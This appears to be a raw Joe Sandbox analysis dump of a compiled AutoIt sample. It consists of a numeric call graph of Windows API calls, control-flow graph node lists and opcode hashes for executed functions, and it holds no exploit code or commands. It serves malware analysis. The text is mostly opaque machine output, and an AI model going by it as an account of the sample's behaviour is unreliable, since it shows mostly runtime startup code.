95994 98b495 95981->95994 95982 98b69b 96010 98ba85 48 API calls ___crtGetEnvironmentStringsW 95982->96010 95984 98b6b5 Mailbox 95984->94957 95987 9f397b 96014 9c26bc 88 API calls 4 library calls 95987->96014 95988 9f3939 ___crtGetEnvironmentStringsW 96013 9c26bc 88 API calls 4 library calls 95988->96013 95989 98ba85 48 API calls 95989->95994 95992 9f3973 95992->95984 95994->95982 95994->95987 95994->95988 95994->95989 95997 98bcce 48 API calls 95994->95997 95999 98b9e4 95994->95999 96000 9f3909 95994->96000 96002 98bb85 48 API calls 95994->96002 96005 98bdfa 48 API calls 95994->96005 96008 98c413 59 API calls 95994->96008 96009 98bc74 48 API calls 95994->96009 96011 98c6a5 49 API calls 95994->96011 96012 98c799 48 API calls ___crtGetEnvironmentStringsW 95994->96012 95996 9f3989 96015 98ba85 48 API calls ___crtGetEnvironmentStringsW 95996->96015 95997->95994 96016 9c26bc 88 API calls 4 library calls 95999->96016 96001 986b4a 48 API calls 96000->96001 96003 9f3914 96001->96003 96002->95994 96007 99f4ea 48 API calls 96003->96007 96006 98b66c CharUpperBuffW 96005->96006 96006->95994 96007->95988 96008->95994 96009->95994 96010->95984 96011->95994 96012->95994 96013->95992 96014->95996 96015->95992 96016->95992 96018 9c6529 96017->96018 96019 9c6cc4 FindFirstFileW 96017->96019 96018->94882 96019->96018 96020 9c6cd9 FindClose 96019->96020 96020->96018 96021->94475 96022 9f19cb 96027 982322 96022->96027 96024 9f19d1 96060 9a0f0a 52 API calls __cinit 96024->96060 96026 9f19db 96028 982344 96027->96028 96061 9826df 96028->96061 96033 98d7f7 48 API calls 96034 982384 96033->96034 96035 98d7f7 48 API calls 96034->96035 96036 98238e 96035->96036 96037 98d7f7 48 API calls 96036->96037 96038 982398 96037->96038 96039 98d7f7 48 API calls 96038->96039 96040 9823de 96039->96040 96041 98d7f7 48 API calls 96040->96041 96042 9824c1 96041->96042 96069 98263f 96042->96069 96046 9824f1 96047 98d7f7 48 API calls 96046->96047 96048 9824fb 96047->96048 96098 982745 96048->96098 96050 982546 96051 982556 GetStdHandle 96050->96051 96052 9f501d 96051->96052 96053 9825b1 96051->96053 96052->96053 96055 9f5026 96052->96055 96054 9825b7 CoInitialize 96053->96054 96054->96024 96105 9c92d4 53 API calls 96055->96105 96057 9f502d 96106 9c99f9 CreateThread 96057->96106 96059 9f5039 CloseHandle 96059->96054 96060->96026 96107 982854 96061->96107 96064 986a63 48 API calls 96065 98234a 96064->96065 96066 98272e 96065->96066 96121 9827ec 6 API calls 96066->96121 96068 98237a 96068->96033 96070 98d7f7 48 API calls 96069->96070 96071 98264f 96070->96071 96072 98d7f7 48 API calls 96071->96072 96073 982657 96072->96073 96122 9826a7 96073->96122 96076 9826a7 48 API calls 96077 982667 96076->96077 96078 98d7f7 48 API calls 96077->96078 96079 982672 96078->96079 96080 99f4ea 48 API calls 96079->96080 96081 9824cb 96080->96081 96082 9822a4 96081->96082 96083 9822b2 96082->96083 96084 98d7f7 48 API calls 96083->96084 96085 9822bd 96084->96085 96086 98d7f7 48 API calls 96085->96086 96087 9822c8 96086->96087 96088 98d7f7 48 API calls 96087->96088 96089 9822d3 96088->96089 96090 98d7f7 48 API calls 96089->96090 96091 9822de 96090->96091 96092 9826a7 48 API calls 96091->96092 96093 9822e9 96092->96093 96094 99f4ea 48 API calls 96093->96094 96095 9822f0 96094->96095 96096 9822f9 RegisterClipboardFormatW 96095->96096 96097 9f1fe7 96095->96097 96096->96046 96099 9f5f4d 96098->96099 96100 982755 96098->96100 96127 9cc942 50 API calls 96099->96127 96102 99f4ea 48 API calls 96100->96102 96104 98275d 96102->96104 96103 9f5f58 96104->96050 96105->96057 96106->96059 96128 9c99df 54 API calls 96106->96128 96114 982870 96107->96114 96110 982870 48 API calls 96111 982864 96110->96111 96112 98d7f7 48 API calls 96111->96112 96113 982716 96112->96113 96113->96064 96115 98d7f7 48 API calls 96114->96115 96116 98287b 96115->96116 96117 98d7f7 48 API calls 96116->96117 96118 982883 96117->96118 96119 98d7f7 48 API calls 96118->96119 96120 98285c 96119->96120 96120->96110 96121->96068 96123 98d7f7 48 API calls 96122->96123 96124 9826b0 96123->96124 96125 98d7f7 48 API calls 96124->96125 96126 98265f 96125->96126 96126->96076 96127->96103 96129 9f197b 96134 99dd94 96129->96134 96133 9f198a 96135 99f4ea 48 API calls 96134->96135 96136 99dd9c 96135->96136 96138 99ddb0 96136->96138 96142 99df3d 96136->96142 96141 9a0f0a 52 API calls __cinit 96138->96141 96141->96133 96143 99dda8 96142->96143 96144 99df46 96142->96144 96146 99ddc0 96143->96146 96174 9a0f0a 52 API calls __cinit 96144->96174 96147 98d7f7 48 API calls 96146->96147 96148 99ddd7 GetVersionExW 96147->96148 96149 986a63 48 API calls 96148->96149 96150 99de1a 96149->96150 96175 99dfb4 96150->96175 96153 986571 48 API calls 96156 99de2e 96153->96156 96155 9f24c8 96156->96155 96179 99df77 96156->96179 96158 99dea4 GetCurrentProcess 96188 99df5f LoadLibraryA GetProcAddress 96158->96188 96159 99debb 96161 99df31 GetSystemInfo 96159->96161 96162 99dee3 96159->96162 96163 99df0e 96161->96163 96182 99e00c 96162->96182 96165 99df1c FreeLibrary 96163->96165 96166 99df21 96163->96166 96165->96166 96166->96138 96168 99df29 GetSystemInfo 96171 99df03 96168->96171 96169 99def9 96185 99dff4 96169->96185 96171->96163 96173 99df09 FreeLibrary 96171->96173 96173->96163 96174->96143 96176 99dfbd 96175->96176 96177 98b18b 48 API calls 96176->96177 96178 99de22 96177->96178 96178->96153 96189 99df89 96179->96189 96193 99e01e 96182->96193 96186 99e00c 2 API calls 96185->96186 96187 99df01 GetNativeSystemInfo 96186->96187 96187->96171 96188->96159 96190 99dea0 96189->96190 96191 99df92 LoadLibraryA 96189->96191 96190->96158 96190->96159 96191->96190 96192 99dfa3 GetProcAddress 96191->96192 96192->96190 96194 99def1 96193->96194 96195 99e027 LoadLibraryA 96193->96195 96194->96168 96194->96169 96195->96194 96196 99e038 GetProcAddress 96195->96196 96196->96194 96197 9f19ba 96202 99c75a 96197->96202 96201 9f19c9 96203 98d7f7 48 API calls 96202->96203 96204 99c7c8 96203->96204 96210 99d26c 96204->96210 96207 99c865 96208 99c881 96207->96208 96213 99d1fa 48 API calls ___crtGetEnvironmentStringsW 96207->96213 96209 9a0f0a 52 API calls __cinit 96208->96209 96209->96201 96214 99d298 96210->96214 96213->96207 96215 99d28b 96214->96215 96216 99d2a5 96214->96216 96215->96207 96216->96215 96217 99d2ac RegOpenKeyExW 96216->96217 96217->96215 96218 99d2c6 RegQueryValueExW 96217->96218 96219 99d2fc RegCloseKey 96218->96219 96220 99d2e7 96218->96220 96219->96215 96220->96219 96221 9a5dfd 96222 9a5e09 _doexit 96221->96222 96258 9a7eeb GetStartupInfoW 96222->96258 96224 9a5e0e 96260 9a9ca7 GetProcessHeap 96224->96260 96226 9a5e66 96227 9a5e71 96226->96227 96342 9a5f4d 47 API calls 3 library calls 96226->96342 96261 9a7b47 96227->96261 96230 9a5e77 96231 9a5e82 __RTC_Initialize 96230->96231 96343 9a5f4d 47 API calls 3 library calls 96230->96343 96282 9aacb3 96231->96282 96234 9a5e91 96235 9a5e9d GetCommandLineW 96234->96235 96344 9a5f4d 47 API calls 3 library calls 96234->96344 96301 9b2e7d GetEnvironmentStringsW 96235->96301 96238 9a5e9c 96238->96235 96241 9a5eb7 96242 9a5ec2 96241->96242 96345 9a115b 47 API calls 3 library calls 96241->96345 96311 9b2cb4 96242->96311 96245 9a5ec8 96246 9a5ed3 96245->96246 96346 9a115b 47 API calls 3 library calls 96245->96346 96325 9a1195 96246->96325 96249 9a5edb 96250 9a5ee6 __wwincmdln 96249->96250 96347 9a115b 47 API calls 3 library calls 96249->96347 96329 983a0f 96250->96329 96253 9a5efa 96259 9a7f01 96258->96259 96259->96224 96260->96226 96350 9a123a 30 API calls 2 library calls 96261->96350 96263 9a7b4c 96351 9a7e23 InitializeCriticalSectionAndSpinCount 96263->96351 96265 9a7b51 96266 9a7b55 96265->96266 96353 9a7e6d TlsAlloc 96265->96353 96352 9a7bbd 50 API calls 2 library calls 96266->96352 96269 9a7b67 96269->96266 96271 9a7b72 96269->96271 96270 9a7b5a 96270->96230 96354 9a6986 96271->96354 96274 9a7bb4 96362 9a7bbd 50 API calls 2 library calls 96274->96362 96277 9a7b93 96277->96274 96279 9a7b99 96277->96279 96278 9a7bb9 96278->96230 96361 9a7a94 47 API calls 4 library calls 96279->96361 96281 9a7ba1 GetCurrentThreadId 96281->96230 96283 9aacbf _doexit 96282->96283 96284 9a7cf4 __lock 47 API calls 96283->96284 96285 9aacc6 96284->96285 96286 9a6986 __calloc_crt 47 API calls 96285->96286 96288 9aacd7 96286->96288 96287 9aad42 GetStartupInfoW 96289 9aad57 96287->96289 96291 9aae80 96287->96291 96288->96287 96290 9aace2 _doexit @_EH4_CallFilterFunc@8 96288->96290 96289->96291 96295 9a6986 __calloc_crt 47 API calls 96289->96295 96298 9aada5 96289->96298 96290->96234 96292 9aaf44 96291->96292 96294 9aaec9 GetStdHandle 96291->96294 96296 9aaedb GetFileType 96291->96296 96297 9aaf08 InitializeCriticalSectionAndSpinCount 96291->96297 96371 9aaf58 RtlLeaveCriticalSection _doexit 96292->96371 96294->96291 96295->96289 96296->96291 96297->96291 96298->96291 96299 9aadd7 GetFileType 96298->96299 96300 9aade5 InitializeCriticalSectionAndSpinCount 96298->96300 96299->96298 96299->96300 96300->96298 96302 9b2e8e 96301->96302 96303 9a5ead 96301->96303 96304 9a69d0 __malloc_crt 47 API calls 96302->96304 96307 9b2a7b GetModuleFileNameW 96303->96307 96305 9b2eb4 ___crtGetEnvironmentStringsW 96304->96305 96306 9b2eca FreeEnvironmentStringsW 96305->96306 96306->96303 96308 9b2aaf _wparse_cmdline 96307->96308 96309 9a69d0 __malloc_crt 47 API calls 96308->96309 96310 9b2aef _wparse_cmdline 96308->96310 96309->96310 96310->96241 96312 9b2ccd __wsetenvp 96311->96312 96313 9b2cc5 96311->96313 96314 9a6986 __calloc_crt 47 API calls 96312->96314 96313->96245 96315 9b2cf6 __wsetenvp 96314->96315 96315->96313 96317 9a6986 __calloc_crt 47 API calls 96315->96317 96318 9b2d4d 96315->96318 96319 9b2d72 96315->96319 96322 9b2d89 96315->96322 96372 9b2567 47 API calls __strnicmp_l 96315->96372 96316 9a1c9d _free 47 API calls 96316->96313 96317->96315 96318->96316 96320 9a1c9d _free 47 API calls 96319->96320 96320->96313 96373 9a6e20 IsProcessorFeaturePresent 96322->96373 96324 9b2d95 96324->96245 96326 9a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96325->96326 96328 9a11e0 __IsNonwritableInCurrentImage 96326->96328 96388 9a0f0a 52 API calls __cinit 96326->96388 96328->96249 96330 9f1ebf 96329->96330 96331 983a29 96329->96331 96332 983a63 745AC8D0 96331->96332 96389 9a1405 96332->96389 96336 983a8f 96401 983adb SystemParametersInfoW SystemParametersInfoW 96336->96401 96338 983a9b 96402 983d19 96338->96402 96340 983aa3 SystemParametersInfoW 96341 983ac8 96340->96341 96341->96253 96342->96227 96343->96231 96344->96238 96350->96263 96351->96265 96352->96270 96353->96269 96356 9a698d 96354->96356 96357 9a69ca 96356->96357 96358 9a69ab Sleep 96356->96358 96363 9b30aa 96356->96363 96357->96274 96360 9a7ec9 TlsSetValue 96357->96360 96359 9a69c2 96358->96359 96359->96356 96359->96357 96360->96277 96361->96281 96362->96278 96364 9b30b5 96363->96364 96368 9b30d0 __calloc_impl 96363->96368 96365 9b30c1 96364->96365 96364->96368 96370 9a7c0e 47 API calls __getptd_noexit 96365->96370 96367 9b30e0 RtlAllocateHeap 96367->96368 96369 9b30c6 96367->96369 96368->96367 96368->96369 96369->96356 96370->96369 96371->96290 96372->96315 96374 9a6e2b 96373->96374 96379 9a6cb5 96374->96379 96378 9a6e46 96378->96324 96380 9a6ccf _memset ___raise_securityfailure 96379->96380 96381 9a6cef IsDebuggerPresent 96380->96381 96387 9a81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96381->96387 96383 9a6db3 ___raise_securityfailure 96384 9aa70c __crtGetStringTypeA_stat 6 API calls 96383->96384 96385 9a6dd6 96384->96385 96386 9a8197 GetCurrentProcess TerminateProcess 96385->96386 96386->96378 96387->96383 96388->96328 96390 9a7cf4 __lock 47 API calls 96389->96390 96391 9a1410 96390->96391 96454 9a7e58 RtlLeaveCriticalSection 96391->96454 96393 983a88 96394 9a146d 96393->96394 96395 9a1491 96394->96395 96396 9a1477 96394->96396 96395->96336 96396->96395 96455 9a7c0e 47 API calls __getptd_noexit 96396->96455 96398 9a1481 96456 9a6e10 8 API calls __strnicmp_l 96398->96456 96400 9a148c 96400->96336 96401->96338 96403 983d26 __ftell_nolock 96402->96403 96404 98d7f7 48 API calls 96403->96404 96405 983d31 GetCurrentDirectoryW 96404->96405 96457 9861ca 96405->96457 96407 983d57 IsDebuggerPresent 96408 983d65 96407->96408 96409 9f1cc1 MessageBoxA 96407->96409 96410 983e3a 96408->96410 96411 9f1cd9 96408->96411 96412 983d82 96408->96412 96409->96411 96413 983e41 SetCurrentDirectoryW 96410->96413 96643 99c682 48 API calls 96411->96643 96531 9840e5 96412->96531 96416 983e4e Mailbox 96413->96416 96416->96340 96417 9f1ce9 96422 9f1cff SetCurrentDirectoryW 96417->96422 96422->96416 96454->96393 96455->96398 96456->96400 96646 99e99b 96457->96646 96461 9861eb 96462 985374 50 API calls 96461->96462 96463 9861ff 96462->96463 96464 98ce19 48 API calls 96463->96464 96465 98620c 96464->96465 96663 9839db 96465->96663 96467 986216 Mailbox 96468 986eed 48 API calls 96467->96468 96469 98622b 96468->96469 96675 989048 96469->96675 96472 98ce19 48 API calls 96473 986244 96472->96473 96678 98d6e9 96473->96678 96475 986254 Mailbox 96476 98ce19 48 API calls 96475->96476 96477 98627c 96476->96477 96478 98d6e9 55 API calls 96477->96478 96479 98628f Mailbox 96478->96479 96480 98ce19 48 API calls 96479->96480 96481 9862a0 96480->96481 96482 98d645 53 API calls 96481->96482 96483 9862b2 Mailbox 96482->96483 96484 98d7f7 48 API calls 96483->96484 96485 9862c5 96484->96485 96682 9863fc 96485->96682 96489 9862df 96490 9862e9 96489->96490 96491 9f1c08 96489->96491 96493 9a0fa7 _W_store_winword 59 API calls 96490->96493 96492 9863fc 48 API calls 96491->96492 96494 9f1c1c 96492->96494 96495 9862f4 96493->96495 96498 9863fc 48 API calls 96494->96498 96495->96494 96496 9862fe 96495->96496 96497 9a0fa7 _W_store_winword 59 API calls 96496->96497 96499 986309 96497->96499 96500 9f1c38 96498->96500 96499->96500 96501 986313 96499->96501 96503 985374 50 API calls 96500->96503 96502 9a0fa7 _W_store_winword 59 API calls 96501->96502 96504 98631e 96502->96504 96505 9f1c5d 96503->96505 96506 98635f 96504->96506 96511 9863fc 48 API calls 96504->96511 96522 9f1c86 96504->96522 96507 9863fc 48 API calls 96505->96507 96509 98636c 96506->96509 96506->96522 96508 9f1c69 96507->96508 96510 986eed 48 API calls 96508->96510 96516 99c050 48 API calls 96509->96516 96513 9f1c77 96510->96513 96514 986342 96511->96514 96512 986eed 48 API calls 96515 9f1ca8 96512->96515 96518 9863fc 48 API calls 96513->96518 96519 986eed 48 API calls 96514->96519 96520 9863fc 48 API calls 96515->96520 96517 986384 96516->96517 96521 991b90 48 API calls 96517->96521 96518->96522 96523 986350 96519->96523 96524 9f1cb5 96520->96524 96528 986394 96521->96528 96522->96512 96525 9863fc 48 API calls 96523->96525 96524->96524 96525->96506 96526 991b90 48 API calls 96526->96528 96528->96526 96529 9863fc 48 API calls 96528->96529 96530 9863d6 Mailbox 96528->96530 96698 986b68 48 API calls 96528->96698 96529->96528 96530->96407 96532 9840f2 __ftell_nolock 96531->96532 96533 9f370e _memset 96532->96533 96534 98410b 96532->96534 96537 9f372a 7516D0D0 96533->96537 96535 98660f 49 API calls 96534->96535 96536 984114 96535->96536 96539 9f3779 96537->96539 96643->96417 96647 98d7f7 48 API calls 96646->96647 96648 9861db 96647->96648 96649 986009 96648->96649 96650 986016 __ftell_nolock 96649->96650 96651 986a63 48 API calls 96650->96651 96655 98617c Mailbox 96650->96655 96653 986048 96651->96653 96661 98607e Mailbox 96653->96661 96699 9861a6 96653->96699 96654 98614f 96654->96655 96656 98ce19 48 API calls 96654->96656 96655->96461 96658 986170 96656->96658 96657 98ce19 48 API calls 96657->96661 96660 9864cf 48 API calls 96658->96660 96659 9861a6 48 API calls 96659->96661 96660->96655 96661->96654 96661->96655 96661->96657 96661->96659 96662 9864cf 48 API calls 96661->96662 96662->96661 96664 9841a9 136 API calls 96663->96664 96665 9839fe 96664->96665 96666 983a06 96665->96666 96702 9cc396 96665->96702 96666->96467 96669 9f2ff0 96670 9a1c9d _free 47 API calls 96669->96670 96672 9f2ffd 96670->96672 96671 984252 84 API calls 96671->96669 96673 984252 84 API calls 96672->96673 96674 9f3006 96673->96674 96674->96674 96676 99f4ea 48 API calls 96675->96676 96677 986237 96676->96677 96677->96472 96679 98d6f4 96678->96679 96681 98d71b 96679->96681 96737 98d764 55 API calls 96679->96737 96681->96475 96683 98641f 96682->96683 96684 986406 96682->96684 96686 986a63 48 API calls 96683->96686 96685 986eed 48 API calls 96684->96685 96687 9862d1 96685->96687 96686->96687 96688 9a0fa7 96687->96688 96689 9a1028 96688->96689 96690 9a0fb3 96688->96690 96740 9a103a 59 API calls 3 library calls 96689->96740 96697 9a0fd8 96690->96697 96738 9a7c0e 47 API calls __getptd_noexit 96690->96738 96693 9a1035 96693->96489 96694 9a0fbf 96739 9a6e10 8 API calls __strnicmp_l 96694->96739 96696 9a0fca 96696->96489 96697->96489 96698->96528 96700 98bdfa 48 API calls 96699->96700 96701 9861b1 96700->96701 96701->96653 96703 984517 83 API calls 96702->96703 96704 9cc405 96703->96704 96705 9cc56d 94 API calls 96704->96705 96706 9cc417 96705->96706 96707 9844ed 64 API calls 96706->96707 96735 9cc41b 96706->96735 96708 9cc432 96707->96708 96709 9844ed 64 API calls 96708->96709 96710 9cc442 96709->96710 96711 9844ed 64 API calls 96710->96711 96712 9cc45d 96711->96712 96713 9844ed 64 API calls 96712->96713 96714 9cc478 96713->96714 96715 984517 83 API calls 96714->96715 96716 9cc48f 96715->96716 96717 9a395c __crtGetStringTypeA_stat 47 API calls 96716->96717 96718 9cc496 96717->96718 96719 9a395c __crtGetStringTypeA_stat 47 API calls 96718->96719 96720 9cc4a0 96719->96720 96721 9844ed 64 API calls 96720->96721 96722 9cc4b4 96721->96722 96723 9cbf5a GetSystemTimeAsFileTime 96722->96723 96724 9cc4c7 96723->96724 96725 9cc4dc 96724->96725 96726 9cc4f1 96724->96726 96729 9a1c9d _free 47 API calls 96725->96729 96727 9cc556 96726->96727 96728 9cc4f7 96726->96728 96731 9a1c9d _free 47 API calls 96727->96731 96730 9cb965 118 API calls 96728->96730 96732 9cc4e2 96729->96732 96733 9cc54e 96730->96733 96731->96735 96734 9a1c9d _free 47 API calls 96732->96734 96736 9a1c9d _free 47 API calls 96733->96736 96734->96735 96735->96669 96735->96671 96736->96735 96737->96681 96738->96694 96739->96696 96740->96693 97076 983742 97077 98374b 97076->97077 97078 9837c8 97077->97078 97079 983769 97077->97079 97115 9837c6 97077->97115 97081 9837ce 97078->97081 97082 9f1e00 97078->97082 97083 98382c PostQuitMessage 97079->97083 97084 983776 97079->97084 97080 9837ab NtdllDefWindowProc_W 97118 9837b9 97080->97118 97087 9837d3 97081->97087 97088 9837f6 SetTimer RegisterClipboardFormatW 97081->97088 97125 982ff6 16 API calls 97082->97125 97083->97118 97085 9f1e88 97084->97085 97086 983781 97084->97086 97130 9c4ddd 60 API calls _memset 97085->97130 97091 983789 97086->97091 97092 983836 97086->97092 97095 9837da KillTimer 97087->97095 97096 9f1da3 97087->97096 97093 98381f CreatePopupMenu 97088->97093 97088->97118 97090 9f1e27 97126 99e312 335 API calls Mailbox 97090->97126 97098 983794 97091->97098 97109 9f1e6d 97091->97109 97123 99eb83 53 API calls _memset 97092->97123 97093->97118 97121 983847 Shell_NotifyIconW _memset 97095->97121 97101 9f1ddc MoveWindow 97096->97101 97102 9f1da8 97096->97102 97104 9f1e58 97098->97104 97110 98379f 97098->97110 97099 9f1e9a 97099->97080 97099->97118 97101->97118 97106 9f1dac 97102->97106 97107 9f1dcb SetFocus 97102->97107 97128 9c55bd 70 API calls _memset 97104->97128 97105 983845 97105->97118 97106->97110 97111 9f1db5 97106->97111 97107->97118 97108 9837ed 97122 98390f DeleteObject DestroyWindow Mailbox 97108->97122 97109->97080 97129 9ba5f3 48 API calls 97109->97129 97110->97080 97127 983847 Shell_NotifyIconW _memset 97110->97127 97124 982ff6 16 API calls 97111->97124 97115->97080 97119 9f1e4c 97120 984ffc 67 API calls 97119->97120 97120->97115 97121->97108 97122->97118 97123->97105 97124->97118 97125->97090 97126->97110 97127->97119 97128->97105 97129->97115 97130->97099 97131 991407 97161 99d3be 97131->97161 97133 99141d 97134 99d922 55 API calls 97133->97134 97154 98fec8 97134->97154 97136 99f4ea 48 API calls 97136->97154 97137 99146e 97144 986eed 48 API calls 97137->97144 97139 990509 97175 9ccc5c 86 API calls 4 library calls 97139->97175 97140 986eed 48 API calls 97140->97154 97142 991473 97174 9ccc5c 86 API calls 4 library calls 97142->97174 97143 9fa246 97148 986eed 48 API calls 97143->97148 97158 98ffe1 97144->97158 97145 9fa922 97148->97158 97149 9fa873 97150 98d7f7 48 API calls 97150->97154 97151 9fa30e 97151->97158 97172 9b97ed InterlockedDecrement 97151->97172 97152 9b97ed InterlockedDecrement 97152->97154 97154->97136 97154->97137 97154->97139 97154->97140 97154->97142 97154->97143 97154->97150 97154->97151 97154->97152 97155 9fa973 97154->97155 97156 9a0f0a 52 API calls __cinit 97154->97156 97154->97158 97160 99144d 97154->97160 97170 991820 335 API calls 2 library calls 97154->97170 97171 991d10 59 API calls Mailbox 97154->97171 97176 9ccc5c 86 API calls 4 library calls 97155->97176 97156->97154 97159 9fa982 97173 9ccc5c 86 API calls 4 library calls 97160->97173 97162 99d3ca 97161->97162 97163 99d3dc 97161->97163 97177 98dcae 50 API calls Mailbox 97162->97177 97165 99d40b 97163->97165 97166 99d3e2 97163->97166 97178 98dcae 50 API calls Mailbox 97165->97178 97167 99f4ea 48 API calls 97166->97167 97169 99d3d4 97167->97169 97169->97133 97170->97154 97171->97154 97172->97158 97173->97158 97174->97149 97175->97145 97176->97159 97177->97169 97178->97169

                                    Executed Functions

                                    Function 009AB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 856 9ab043-9ab080 call 9af8a0 859 9ab089-9ab08b 856->859 860 9ab082-9ab084 856->860 862 9ab0ac-9ab0d9 859->862 863 9ab08d-9ab0a7 call 9a7bda call 9a7c0e call 9a6e10 859->863 861 9ab860-9ab86c call 9aa70c 860->861 864 9ab0db-9ab0de 862->864 865 9ab0e0-9ab0e7 862->865 863->861 864->865 868 9ab10b-9ab110 864->868 869 9ab0e9-9ab100 call 9a7bda call 9a7c0e call 9a6e10 865->869 870 9ab105 865->870 874 9ab11f-9ab12d call 9b3bf2 868->874 875 9ab112-9ab11c call 9af82f 868->875 905 9ab851-9ab854 869->905 870->868 886 9ab44b-9ab45d 874->886 887 9ab133-9ab145 874->887 875->874 890 9ab7b8-9ab7d5 WriteFile 886->890 891 9ab463-9ab473 886->891 887->886 889 9ab14b-9ab183 call 9a7a0d GetConsoleMode 887->889 889->886 910 9ab189-9ab18f 889->910 893 9ab7e1-9ab7e7 GetLastError 890->893 894 9ab7d7-9ab7df 890->894 896 9ab55a-9ab55f 891->896 897 9ab479-9ab484 891->897 899 9ab7e9 893->899 894->899 900 9ab663-9ab66e 896->900 901 9ab565-9ab56e 896->901 903 9ab48a-9ab49a 897->903 904 9ab81b-9ab833 897->904 907 9ab7ef-9ab7f1 899->907 900->904 906 9ab674 900->906 901->904 908 9ab574 901->908 911 9ab4a0-9ab4a3 903->911 912 9ab83e-9ab84e call 9a7c0e call 9a7bda 904->912 913 9ab835-9ab838 904->913 909 9ab85e-9ab85f 905->909 915 9ab67e-9ab693 906->915 917 9ab7f3-9ab7f5 907->917 918 9ab856-9ab85c 907->918 919 9ab57e-9ab595 908->919 909->861 920 9ab199-9ab1bc GetConsoleCP 910->920 921 9ab191-9ab193 910->921 922 9ab4e9-9ab520 WriteFile 911->922 923 9ab4a5-9ab4be 911->923 912->905 913->912 914 9ab83a-9ab83c 913->914 914->909 925 9ab699-9ab69b 915->925 917->904 927 9ab7f7-9ab7fc 917->927 918->909 928 9ab59b-9ab59e 919->928 929 9ab1c2-9ab1ca 920->929 930 9ab440-9ab446 920->930 921->886 921->920 922->893 924 9ab526-9ab538 922->924 931 9ab4cb-9ab4e7 923->931 932 9ab4c0-9ab4ca 923->932 924->907 933 9ab53e-9ab54f 924->933 934 9ab6d8-9ab719 WideCharToMultiByte 925->934 935 9ab69d-9ab6b3 925->935 937 9ab7fe-9ab810 call 9a7c0e call 9a7bda 927->937 938 9ab812-9ab819 call 9a7bed 927->938 939 9ab5de-9ab627 WriteFile 928->939 940 9ab5a0-9ab5b6 928->940 941 9ab1d4-9ab1d6 929->941 930->917 931->911 931->922 932->931 933->903 942 9ab555 933->942 934->893 946 9ab71f-9ab721 934->946 943 9ab6c7-9ab6d6 935->943 944 9ab6b5-9ab6c4 935->944 937->905 938->905 939->893 951 9ab62d-9ab645 939->951 948 9ab5b8-9ab5ca 940->948 949 9ab5cd-9ab5dc 940->949 952 9ab36b-9ab36e 941->952 953 9ab1dc-9ab1fe 941->953 942->907 943->925 943->934 944->943 956 9ab727-9ab75a WriteFile 946->956 948->949 949->928 949->939 951->907 959 9ab64b-9ab658 951->959 954 9ab370-9ab373 952->954 955 9ab375-9ab3a2 952->955 960 9ab200-9ab215 953->960 961 9ab217-9ab223 call 9a1688 953->961 954->955 964 9ab3a8-9ab3ab 954->964 955->964 965 9ab77a-9ab78e GetLastError 956->965 966 9ab75c-9ab776 956->966 959->919 968 9ab65e 959->968 962 9ab271-9ab283 call 9b40f7 960->962 976 9ab269-9ab26b 961->976 977 9ab225-9ab239 961->977 986 9ab289 962->986 987 9ab435-9ab43b 962->987 970 9ab3ad-9ab3b0 964->970 971 9ab3b2-9ab3c5 call 9b5884 964->971 975 9ab794-9ab796 965->975 966->956 973 9ab778 966->973 968->907 970->971 978 9ab407-9ab40a 970->978 971->893 990 9ab3cb-9ab3d5 971->990 973->975 975->899 981 9ab798-9ab7b0 975->981 976->962 983 9ab23f-9ab254 call 9b40f7 977->983 984 9ab412-9ab42d 977->984 978->941 982 9ab410 978->982 981->915 988 9ab7b6 981->988 982->987 983->987 996 9ab25a-9ab267 983->996 984->987 991 9ab28f-9ab2c4 WideCharToMultiByte 986->991 987->899 988->907 993 9ab3fb-9ab401 990->993 994 9ab3d7-9ab3ee call 9b5884 990->994 991->987 995 9ab2ca-9ab2f0 WriteFile 991->995 993->978 994->893 1001 9ab3f4-9ab3f5 994->1001 995->893 998 9ab2f6-9ab30e 995->998 996->991 998->987 999 9ab314-9ab31b 998->999 999->993 1002 9ab321-9ab34c WriteFile 999->1002 1001->993 1002->893 1003 9ab352-9ab359 1002->1003 1003->987 1004 9ab35f-9ab366 1003->1004 1004->993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                    • Instruction ID: 3ca2b0ba836b11f5787cb1279356e3110861f6ada2f8aa8387a57d12d48fe2e3
                                    • Opcode Fuzzy Hash: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                    • Instruction Fuzzy Hash: D0324F75B022288BDB24CF58DC416E9B7B9FB4B314F1841D9E40AA7A52D7349E81CF92
                                    Function 00983D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                      • Part of subcall function 00986430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983DEE,00A41148,?,?,?,?,?,00983AA3,?), ref: 00986471
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A328F4,00000010), ref: 009F1CCE
